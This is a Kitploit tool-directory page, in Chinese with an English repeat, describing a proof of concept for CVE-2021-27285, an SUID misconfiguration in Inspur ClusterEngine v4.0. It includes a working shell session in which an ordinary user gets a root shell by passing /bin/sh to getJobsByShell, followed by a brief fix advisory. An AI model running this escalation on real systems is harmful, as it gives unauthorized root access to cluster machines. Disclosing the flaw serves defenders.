Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-27285 — 针对浪潮 ClusterEngine SUID 配置错误(CVE-2021-27285)的概念验证漏洞利用,允许非管理员用户通过 getJobsByShell 组件将权限提升至 root。 | Kitploit
工具/GitHubGitHub/fjh1997/cve-2021-27285
权限提升漏洞分析漏洞利用渗透测试红队二进制利用
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

针对浪潮 ClusterEngine SUID 配置错误(CVE-2021-27285)的概念验证漏洞利用,允许非管理员用户通过 getJobsByShell 组件将权限提升至 root。

查看仓库
61年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

提权过程如下:

[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

The Inspur ClusterEngine cluster management platform is a job management software specifically designed for Inspur TianSuo series HPC products. A misconfiguration in the SUID settings of Inspur ClusterEngine allows non-administrative users to escalate privileges and obtain root access through certain components.

Inspur ClusterEngine v4.0 has an improper SUID configuration issue with the component "/opt/tsce4/torque6/bin/getJobsByShell", allowing non-administrative users to escalate privileges and gain root access via the SUID mechanism.

The privilege escalation process is as follows:

[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

advisory: patch the relevant components.

下载工具